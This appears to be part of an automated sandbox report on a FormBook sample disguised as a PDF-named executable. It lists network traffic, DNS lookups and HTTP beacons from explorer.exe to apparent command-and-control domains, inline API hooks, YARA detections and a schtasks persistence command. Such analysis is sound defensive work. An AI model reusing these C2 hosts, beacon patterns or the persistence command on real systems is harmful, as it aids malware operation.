Apr 12, 2021 09:43:24.476608992 CEST	80	49732	210.152.87.233	192.168.2.4
Apr 12, 2021 09:43:44.543428898 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.678457975 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.678567886 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.678704023 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.813456059 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.813931942 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.813957930 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.813977003 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.813988924 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814007044 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814023972 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814052105 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814085007 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814115047 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814137936 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.814167023 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.814181089 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.814248085 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.814308882 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.946779966 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.946857929 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.946890116 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.946923971 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.946966887 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947017908 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947036982 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947081089 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947123051 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947174072 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947195053 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947261095 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947295904 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947321892 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947369099 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947427988 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947441101 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947489023 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947525978 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947575092 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947594881 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947635889 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947668076 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947736979 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947753906 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947802067 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947839975 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947899103 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.947911024 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947951078 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.947978020 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.948043108 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.948056936 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.948103905 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.948132992 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.948187113 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.948227882 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.948265076 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:43:44.948298931 CEST	80	49740	198.185.159.144	192.168.2.4
Apr 12, 2021 09:43:44.948364019 CEST	49740	80	192.168.2.4	198.185.159.144
Apr 12, 2021 09:44:05.095738888 CEST	49745	80	192.168.2.4	104.21.82.58
Apr 12, 2021 09:44:05.136625051 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.136746883 CEST	49745	80	192.168.2.4	104.21.82.58
Apr 12, 2021 09:44:05.136970043 CEST	49745	80	192.168.2.4	104.21.82.58
Apr 12, 2021 09:44:05.177731991 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511739969 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511765957 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511779070 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511795044 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511806965 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511820078 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.511832952 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.512187958 CEST	49745	80	192.168.2.4	104.21.82.58
Apr 12, 2021 09:44:05.512254000 CEST	80	49745	104.21.82.58	192.168.2.4
Apr 12, 2021 09:44:05.512424946 CEST	49745	80	192.168.2.4	104.21.82.58
Apr 12, 2021 09:44:05.512471914 CEST	49745	80	192.168.2.4	104.21.82.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 09:42:00.456115961 CEST	53723	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:00.514817953 CEST	53	53723	8.8.8.8	192.168.2.4
Apr 12, 2021 09:42:20.638798952 CEST	64646	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:20.687649965 CEST	53	64646	8.8.8.8	192.168.2.4
Apr 12, 2021 09:42:21.712238073 CEST	65298	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:21.762784004 CEST	53	65298	8.8.8.8	192.168.2.4
Apr 12, 2021 09:42:34.555367947 CEST	59123	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:34.664411068 CEST	53	59123	8.8.8.8	192.168.2.4
Apr 12, 2021 09:42:49.369050980 CEST	54531	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:49.417623997 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 12, 2021 09:42:54.105889082 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:54.168118000 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 12, 2021 09:42:56.157164097 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:42:56.208149910 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:04.455533028 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:04.512917042 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:08.032691956 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:08.082890987 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:09.052828074 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:09.109514952 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:11.218777895 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:11.270282030 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:13.203537941 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:13.264770985 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:18.238046885 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:18.288515091 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:21.329164028 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:21.379790068 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:23.290195942 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:23.596867085 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:33.223427057 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:33.272212029 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:39.423446894 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:39.484484911 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:44.394011974 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:44.542443037 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:48.578572035 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:48.627163887 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 12, 2021 09:43:50.366496086 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:43:50.418059111 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:00.188711882 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:00.237473965 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:01.306541920 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:01.356829882 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:05.012470007 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:05.094029903 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:10.813304901 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:10.863642931 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:11.542563915 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:11.591170073 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:11.745171070 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:11.796700954 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:12.598717928 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:12.658663034 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:12.730773926 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:12.805257082 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 12, 2021 09:44:13.414093971 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 12, 2021 09:44:13.463342905 CEST	53	55046	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 09:43:23.290195942 CEST	192.168.2.4	8.8.8.8	0xfaa4	Standard query (0)	www.hhcuerkn.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:43:44.394011974 CEST	192.168.2.4	8.8.8.8	0x82d5	Standard query (0)	www.mobcitylabs.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:44:05.012470007 CEST	192.168.2.4	8.8.8.8	0x3402	Standard query (0)	www.xinghai-nb.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 09:43:23.596867085 CEST	8.8.8.8	192.168.2.4	0xfaa4	No error (0)	www.hhcuerkn.com	hhcuerkn.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 09:43:23.596867085 CEST	8.8.8.8	192.168.2.4	0xfaa4	No error (0)	hhcuerkn.com		210.152.87.233	A (IP address)	IN (0x0001)
Apr 12, 2021 09:43:44.542443037 CEST	8.8.8.8	192.168.2.4	0x82d5	No error (0)	www.mobcitylabs.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 09:43:44.542443037 CEST	8.8.8.8	192.168.2.4	0x82d5	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Apr 12, 2021 09:43:44.542443037 CEST	8.8.8.8	192.168.2.4	0x82d5	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Apr 12, 2021 09:43:44.542443037 CEST	8.8.8.8	192.168.2.4	0x82d5	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Apr 12, 2021 09:43:44.542443037 CEST	8.8.8.8	192.168.2.4	0x82d5	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Apr 12, 2021 09:44:05.094029903 CEST	8.8.8.8	192.168.2.4	0x3402	No error (0)	www.xinghai-nb.com		104.21.82.58	A (IP address)	IN (0x0001)
Apr 12, 2021 09:44:05.094029903 CEST	8.8.8.8	192.168.2.4	0x3402	No error (0)	www.xinghai-nb.com		172.67.153.207	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.hhcuerkn.com

www.mobcitylabs.com

www.xinghai-nb.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49732	210.152.87.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 09:43:23.894160032 CEST	1127	OUT	GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1 Host: www.hhcuerkn.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 09:43:24.183934927 CEST	1127	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Mon, 12 Apr 2021 07:43:24 GMT Content-Type: text/html Content-Length: 169 Connection: close Location: http://loveru.jp/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49740	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 09:43:44.678704023 CEST	5247	OUT	GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1 Host: www.mobcitylabs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 09:43:44.813931942 CEST	5249	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Mon, 12 Apr 2021 07:43:44 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: kEGnInDp/hKYuFDhP Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49745	104.21.82.58	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 09:44:05.136970043 CEST	5340	OUT	GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1 Host: www.xinghai-nb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 09:44:05.511739969 CEST	5342	IN	HTTP/1.1 200 OK Date: Mon, 12 Apr 2021 07:44:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=d72ec4b3964b294bd555efaced376efd01618213445; expires=Wed, 12-May-21 07:44:05 GMT; path=/; domain=.xinghai-nb.com; HttpOnly; SameSite=Lax Vary: Accept-Encoding X-Powered-By: PHP/7.0.19 CF-Cache-Status: DYNAMIC cf-request-id: 0966a2b631000017529682e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bL4emAZmoLNoh%2F3y5WI9QpI6yOiIcN7xVH9SrzyE6GhNjo6VNig%2BM45zGnZLTIAGb0FPWEmdMWFC37FFas0RU7FLM%2F7C5Hq4GzvkrBsrszU8ZOE%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63ead3d04ee51752-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 37 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 36 34 30 2c 74 61 72 67 65 74 2d 64 65 6e 73 69 74 79 64 70 69 3d 33 32 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e e7 8b bc e4 ba ba 41 56 2c e7 8b bc e4 ba ba 41 50 50 2c e7 8b bc e4 ba ba e5 9c a8 e7 ba bf e8 a7 86 e9 a2 91 2c e7 8b bc e4 ba ba e8 bf 85 e9 9b b7 e4 b8 8b e8 bd bd 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 8b bc e4 ba ba 41 56 2c e7 8b bc e4 ba ba 41 50 50 2c e7 8b bc e4 ba ba e5 9c a8 e7 ba bf e8 a7 86 e9 a2 91 2c e7 8b bc e4 ba ba e8 bf 85 e9 9b b7 e4 b8 8b e8 bd bd 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 8b bc e5 8f 8b e8 a7 86 e9 a2 91 ef bc 88 78 69 6e 67 68 61 69 2d 6e 62 2e 63 6f 6d ef bc 89 e6 94 be e8 bf 87 e6 88 91 2e 2e 2e 2e 2e 2e e4 b8 8d e8 a6 81 2e 2e 2e 2e 2e 2e e7 8b bc e4 ba ba 41 56 2c e7 8b bc e4 ba ba 41 50 50 2c e7 8b bc e4 ba ba e5 9c a8 e7 ba bf e8 a7 86 e9 a2 91 2c e7 8b bc e4 ba ba e8 bf 85 e9 9b b7 e4 b8 8b e8 bd bd e6 ad a3 e5 9c a8 e6 92 ad e6 94 be 2e 2e 2e 2e 2e 2e e5 93 a5 e5 93 a5 2e 2e 2e 2e 2e 2e e4 bc 9a e5 9d 8f e6 8e 89 2e 2e 2e Data Ascii: 17b5<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=640,target-densitydpi=320,user-scalable=no"><title>AV,APP,,</title><meta name="keywords" content="AV,APP,,"><meta name="description" content="xinghai-nb.com............AV,APP,,...............

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE3
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE3
GetMessageW	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE3
GetMessageA	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE3

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: INQUIRY 1820521 pdf.exe PID: 6928 Parent PID: 6004

General

Start time:	09:42:05
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
Imagebase:	0xd50000
File size:	859648 bytes
MD5 hash:	DD3AE15E952C239AE6D87C8374B3B460
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: schtasks.exe PID: 7156 Parent PID: 6928

General

Start time:	09:42:19
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
Imagebase:	0x250000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6204 Parent PID: 7156

General

Start time:	09:42:19
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

